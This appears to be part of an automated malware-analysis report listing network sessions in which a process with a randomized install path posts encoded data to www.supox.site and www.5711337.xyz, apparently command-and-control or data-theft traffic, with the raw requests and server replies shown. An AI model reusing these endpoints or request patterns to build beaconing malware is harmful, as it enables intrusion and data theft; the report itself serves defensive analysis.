                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    27192.168.2.550012162.0.225.218803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:09.996279001 CEST1841OUTPOST /ksch/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.supox.site
                                                                                                                                                                                                                                    Origin: http://www.supox.site
                                                                                                                                                                                                                                    Referer: http://www.supox.site/ksch/
                                                                                                                                                                                                                                    Content-Length: 1245
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 45 2b 4e 54 54 74 2f 73 50 5a 32 4d 77 41 76 64 6e 64 43 66 58 38 4d 55 57 75 32 6a 71 37 42 79 55 6a 36 55 46 4f 54 32 73 33 55 49 61 69 72 49 4d 57 6b 50 73 34 75 72 63 64 72 6c 34 6d 68 6c 2f 36 4d 71 4c 42 53 56 4b 75 37 5a 6d 46 36 2f 33 64 43 68 34 32 4d 2f 62 41 73 65 76 34 79 43 4c 45 37 38 30 33 6a 6e 44 34 57 52 4d 6f 52 33 4e 75 2f 6a 42 64 78 73 45 51 32 68 30 56 42 74 34 56 67 2f 65 6a 33 55 47 47 48 2b 5a 79 68 2b 57 79 4e 65 50 48 51 59 32 70 36 62 66 56 61 74 41 56 35 51 42 47 6f 6f 4b 72 59 44 55 75 2b 6f 54 69 2f 33 4e 76 35 6c 6a 6f 57 32 51 36 52 68 46 41 7a 4f 2f 62 33 36 74 58 79 79 39 32 31 79 2b 64 6a 38 43 5a 79 45 4c 31 41 6b 33 58 6f 75 2b 51 76 6f 53 77 2b 54 67 46 57 36 6e 76 36 5a 4e 67 48 39 79 73 5a 37 38 5a 6b 67 4a 39 77 46 46 48 4a 6a 5a 6a 47 78 31 37 2f 34 42 70 6f 56 66 71 34 43 5a 4b 65 63 70 72 61 73 59 53 79 7a 76 6a 53 69 4f 37 31 64 68 4c 33 6e 76 57 68 46 61 76 5a 35 43 66 58 65 75 44 2f 6a 4b 6f 61 6c 72 2f 59 42 64 4a 42 62 78 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=E+NTTt/sPZ2MwAvdndCfX8MUWu2jq7ByUj6UFOT2s3UIairIMWkPs4urcdrl4mhl/6MqLBSVKu7ZmF6/3dCh42M/bAsev4yCLE7803jnD4WRMoR3Nu/jBdxsEQ2h0VBt4Vg/ej3UGGH+Zyh+WyNePHQY2p6bfVatAV5QBGooKrYDUu+oTi/3Nv5ljoW2Q6RhFAzO/b36tXyy921y+dj8CZyEL1Ak3Xou+QvoSw+TgFW6nv6ZNgH9ysZ78ZkgJ9wFFHJjZjGx17/4BpoVfq4CZKecprasYSyzvjSiO71dhL3nvWhFavZ5CfXeuD/jKoalr/YBdJBbxh3wwz1POn7Ezthn/J+/+ot2/NBBDPwoxohgWNfkfwWUoVUbtdk2unOr1vY4FYc36bU1WXeU7wgqqtYBIUc6d5uqMwzTKv4nU6EH0hXD6WIH7jbR/3WSKSnCqCZHWXuJQ6p9G48B+MT6g3xOy6Idq/7nyj3y+JkaqVBwwjwM4meOMdYPgbaVZmZGiCBXejnejCKfuf4QGO0hY6FY/lacBlbA/5lCAvqWOaTfAw71M/4kIdC6uhD9CbebSrCs3szpO6pFGB2qQS70fQUsp3rpFucC39H621Km+Tztyrezv0fRm/Ce9pVu2mCaXam8XOLGM9RFO877Ztdoe7POfGsTvoBnpeRX1Y6aCLjeOxPO6bOv5kh3+s/aZ5xzdS83btN5h3QWduYXX2XpZWQt1q6M0eYqnx+bKMXOevEf/WiMLiqJd3+Jz9DxC3BDsaBhu52wgB9R7WQq2sUvpOiDWvjDZEwK3BNo5pKh4TPSw9HPj2Vf/eGGTmALbVaXBkQWDecB8uv0KOM2VQH+6oXc9HNrsQ0TImLc+rX7X7vbTi834EeZM8++xveVoe6AkXJoYB3dzSRBc15K74lVMaXxlGP/ugoa5/8dlx6FcTnmapr6FpQ0L2R7JJ2jPIkkSvbBRvwNlUHoNw7Xq8rw2uyXMxu5e/g56HktabmOt6U [TRUNCATED]
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:10.653997898 CEST533INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:11:10 GMT
                                                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                                                    Content-Length: 389
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Content-Type: text/html
                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    28192.168.2.550013162.0.225.218803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:12.537889957 CEST552OUTGET /ksch/?BHNhDJjp=J8lzQYDSDIyYjxmyisycdc0dQo+0mdR+IGXfAda7tEE7fn+2GVkWw6+hdf3A0BNElIx5K3urdoerlkCH3feHlz5JfFADuLqaJ1HoxSfDOrbKFf5fEpK5Atk4IzSpx3Ij7g==&KteDo=fX0Hm8kxa HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.supox.site
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:13.124404907 CEST548INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:11:13 GMT
                                                                                                                                                                                                                                    Server: Apache
                                                                                                                                                                                                                                    Content-Length: 389
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                    Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    29192.168.2.550014103.249.106.91803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:18.270160913 CEST807OUTPOST /886f/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.5711337.xyz
                                                                                                                                                                                                                                    Origin: http://www.5711337.xyz
                                                                                                                                                                                                                                    Referer: http://www.5711337.xyz/886f/
                                                                                                                                                                                                                                    Content-Length: 209
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 49 36 2b 39 58 70 4f 71 55 7a 6b 52 55 6f 36 64 6a 54 4f 52 75 6a 37 2f 4e 34 55 69 6d 57 43 49 72 37 77 4c 43 7a 31 55 63 47 31 6a 7a 74 41 69 69 4c 36 4c 50 6f 52 6b 57 4a 44 4a 7a 52 48 5a 61 59 4b 78 2f 78 4f 48 75 58 6f 64 34 4f 4d 31 4f 35 31 69 4e 74 48 55 62 62 65 51 72 51 39 7a 32 53 31 43 59 42 38 2b 50 73 2b 72 70 62 5a 69 4b 30 50 2f 6e 76 4a 33 76 67 47 39 64 7a 77 6a 4b 6a 59 30 70 2f 46 4d 75 4e 6d 55 77 49 62 64 76 47 34 72 73 41 5a 64 73 38 76 42 74 71 72 2b 6a 6f 4d 58 35 67 4d 5a 64 66 72 4f 78 55 62 4b 54 56 6f 37 71 73 75 73 4a 59 73 76 47 4b 39 37 4d 4e 59 75 36 43 59 3d
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=I6+9XpOqUzkRUo6djTORuj7/N4UimWCIr7wLCz1UcG1jztAiiL6LPoRkWJDJzRHZaYKx/xOHuXod4OM1O51iNtHUbbeQrQ9z2S1CYB8+Ps+rpbZiK0P/nvJ3vgG9dzwjKjY0p/FMuNmUwIbdvG4rsAZds8vBtqr+joMX5gMZdfrOxUbKTVo7qsusJYsvGK97MNYu6CY=
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:19.130822897 CEST190INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:11:18 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    30192.168.2.550015103.249.106.91803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:20.914417982 CEST827OUTPOST /886f/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.5711337.xyz
                                                                                                                                                                                                                                    Origin: http://www.5711337.xyz
                                                                                                                                                                                                                                    Referer: http://www.5711337.xyz/886f/
                                                                                                                                                                                                                                    Content-Length: 229
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 49 36 2b 39 58 70 4f 71 55 7a 6b 52 53 35 71 64 67 30 69 52 36 7a 37 38 42 59 55 69 76 32 43 4d 72 37 38 4c 43 79 41 66 63 55 42 6a 7a 4e 51 69 6c 49 69 4c 49 6f 52 6b 44 35 44 4d 39 78 47 30 61 66 43 44 2f 30 75 48 75 54 49 64 34 4f 63 31 4f 49 31 6a 4d 39 48 57 55 37 65 6f 32 67 39 7a 32 53 31 43 59 41 4d 59 50 73 6d 72 70 72 70 69 4c 57 6e 34 35 2f 4a 6f 6d 41 47 39 57 54 77 6e 4b 6a 59 61 70 2b 70 6d 75 50 75 55 77 4e 2f 64 76 53 6b 6b 31 77 5a 48 6a 63 75 6c 6b 72 36 74 72 61 41 63 7a 32 5a 43 4a 73 6e 4e 39 43 32 67 4a 33 67 54 35 4d 43 55 5a 4c 6b 59 58 36 63 53 57 75 49 65 6b 56 4d 36 6e 67 63 79 51 67 54 6b 6e 76 63 45 41 62 61 52 6b 6d 74 77
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=I6+9XpOqUzkRS5qdg0iR6z78BYUiv2CMr78LCyAfcUBjzNQilIiLIoRkD5DM9xG0afCD/0uHuTId4Oc1OI1jM9HWU7eo2g9z2S1CYAMYPsmrprpiLWn45/JomAG9WTwnKjYap+pmuPuUwN/dvSkk1wZHjculkr6traAcz2ZCJsnN9C2gJ3gT5MCUZLkYX6cSWuIekVM6ngcyQgTknvcEAbaRkmtw
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:21.725495100 CEST190INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:11:21 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    31192.168.2.550016103.249.106.91803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:23.558125973 CEST1844OUTPOST /886f/ HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.5711337.xyz
                                                                                                                                                                                                                                    Origin: http://www.5711337.xyz
                                                                                                                                                                                                                                    Referer: http://www.5711337.xyz/886f/
                                                                                                                                                                                                                                    Content-Length: 1245
                                                                                                                                                                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Data Raw: 42 48 4e 68 44 4a 6a 70 3d 49 36 2b 39 58 70 4f 71 55 7a 6b 52 53 35 71 64 67 30 69 52 36 7a 37 38 42 59 55 69 76 32 43 4d 72 37 38 4c 43 79 41 66 63 55 5a 6a 77 2b 6f 69 6c 70 69 4c 4a 6f 52 6b 66 70 44 4e 39 78 47 4d 61 65 6d 48 2f 30 71 58 75 56 45 64 34 74 45 31 49 37 74 6a 46 39 48 57 57 37 65 54 72 51 39 6d 32 53 6c 65 59 42 77 59 50 73 6d 72 70 70 68 69 43 6b 50 34 37 2f 4a 33 76 67 47 4c 64 7a 78 43 4b 6e 30 73 70 2b 73 54 75 65 4f 55 7a 74 50 64 74 6e 34 6b 71 41 5a 42 67 63 75 39 6b 72 33 31 72 61 63 2b 7a 32 46 73 4a 73 76 4e 2f 32 7a 32 53 6d 6f 5a 6e 4b 44 32 54 5a 59 34 44 75 51 76 65 73 41 69 6e 57 59 76 34 53 4a 64 66 6d 54 66 79 76 4a 4c 62 75 65 73 68 68 4a 34 42 49 39 56 57 2f 64 2f 33 4f 77 2f 44 6e 71 6d 63 31 7a 69 50 4e 49 56 35 71 64 4b 47 74 6b 2b 59 4d 4c 77 67 42 78 6e 43 79 69 65 35 53 4e 61 64 5a 41 2f 32 6a 2b 4b 74 6a 47 36 2f 6f 78 67 49 4b 6b 68 35 6f 32 43 39 47 49 2f 4f 74 54 30 51 48 4e 68 4d 35 32 63 4b 33 37 61 71 58 4c 4e 58 36 72 39 52 6d 7a 58 64 4f 6f 78 59 [TRUNCATED]
                                                                                                                                                                                                                                    Data Ascii: BHNhDJjp=I6+9XpOqUzkRS5qdg0iR6z78BYUiv2CMr78LCyAfcUZjw+oilpiLJoRkfpDN9xGMaemH/0qXuVEd4tE1I7tjF9HWW7eTrQ9m2SleYBwYPsmrpphiCkP47/J3vgGLdzxCKn0sp+sTueOUztPdtn4kqAZBgcu9kr31rac+z2FsJsvN/2z2SmoZnKD2TZY4DuQvesAinWYv4SJdfmTfyvJLbueshhJ4BI9VW/d/3Ow/Dnqmc1ziPNIV5qdKGtk+YMLwgBxnCyie5SNadZA/2j+KtjG6/oxgIKkh5o2C9GI/OtT0QHNhM52cK37aqXLNX6r9RmzXdOoxY7Jjueeeno2px6/qRrIFoO+ehEdlkB0a+oihTjniTbTmpkQ5Znu3O5uHgNz8ejccf9rVtGoZFrUugpMoNSo86lIe7vauK9vDir0OZ6SvtL6THP4DGEPGI8K7pXIGsjb1z+vIl/NqXbbfDrJrw33thSj6Zc4++9kx+fc3Rogr0gupByASiZNfOwlMQDJxvSsfP8o0WkYt4rQIExZgfTaL/OXN7r9LMIePW6j/G0JuL3ic1jqvSjuqoyH+21/5uO5bif9xfkSG5BoUwtDybDngq1OfVWw4HhDQ9Jfm3pjIJGR4or6nrXzwKq/OVzFl3FujttizkY2JLBup7OS5xFPJBTHkd8OYQ4K3CNMz64Zqtsb95BSq/4xFBZbCZ/BOieox9i3GoZXi4xiRC2oe7kjOVDJNLTZPsLVokaJ2+Wc7UTQtOfF0UQ6xVRW5oYLxBmbPaUiAJK/wSOxI9opny3jUE7yjjgnw8Heo2W7WLlTrF+S0ogyZWQihlbR7oAJwKgjJxncgRfTkrOujOn0e0O/iVzwci82E0jVCaWgDreS91v9x+IcMjh/OFEwd7aPMpSbQNIvVtA5GT1DYWo04k14IAOs5BF91o2qDrR+vxizFAxdUqtdQ3hF2cI91K4ecVfyo3TJNq4AHS4xGJaviP5AUo8kdMbwqIN/BXPl [TRUNCATED]
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:24.405448914 CEST190INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:11:24 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Data Raw: 64 0d 0a 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                    Data Ascii: d404 Not Found0


                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                    32192.168.2.550017103.249.106.91803224C:\Program Files (x86)\GmtEwyTBAmcKOJiixqKRweAGWTUfNjZDgusioUNgmggvFtHRFcUIjBFhOeWnaTmmLBqMVUaeEiZNvL\oKWoZthfkV.exe
                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:26.333060026 CEST553OUTGET /886f/?KteDo=fX0Hm8kxa&BHNhDJjp=F4WdUfqIHBg/HL3skErP7lPVDvUzs0Cr8ZA+Fg9dI3ceouFLqqnQf6dPVZvR/nKMPYrd+0qk5jIF7ORmEYYYOZXDdPSYgHhA7DdWNhIxJ8KzsbpvOzugz6Mfni67awxMIw== HTTP/1.1
                                                                                                                                                                                                                                    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                    Host: www.5711337.xyz
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; ODROID-U Build/KTU84Q) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/33.0.0.0 Safari/537.36
                                                                                                                                                                                                                                    Oct 11, 2024 15:11:27.797785997 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                    Server: nginx
                                                                                                                                                                                                                                    Date: Fri, 11 Oct 2024 13:11:27 GMT
                                                                                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                                                                                                    Data Raw: 62 35 37 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6d 69 70 3d 22 22 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 70 70 6c 69 63 61 62 6c 65 2d 64 65 76 69 63 65 22 20 63 6f 6e 74 65 6e 74 3d 22 70 63 2c 6d 6f 62 69 6c 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 4d 6f 62 69 6c 65 4f 70 74 69 6d 69 7a 65 64 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 48 61 6e 64 68 65 6c 64 46 72 69 65 6e 64 6c 79 22 20 63 6f 6e 74 65 6e 74 3d 22 74 72 75 65 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 [TRUNCATED]
